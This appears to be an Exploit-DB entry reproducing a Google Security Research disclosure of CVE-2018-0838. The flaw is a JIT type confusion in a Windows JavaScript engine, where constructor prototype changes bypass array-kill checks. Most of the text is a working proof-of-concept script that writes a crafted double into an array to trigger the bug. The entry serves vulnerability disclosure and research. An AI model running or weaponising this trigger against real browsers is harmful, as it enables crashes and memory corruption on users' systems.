EDB-ID: 44080 | Author: Google Security Research | Published: 2018-02-15 | CVE: CVE-2018-0838 | Type: Dos | Platform: Windows | Aliases: N/A | Advisory/Source: Link | Tags: Type Confusion | Vulnerable App: N/A | This is similar to the previous issues 1457, 1459 (MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.
PoC:
*/
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();
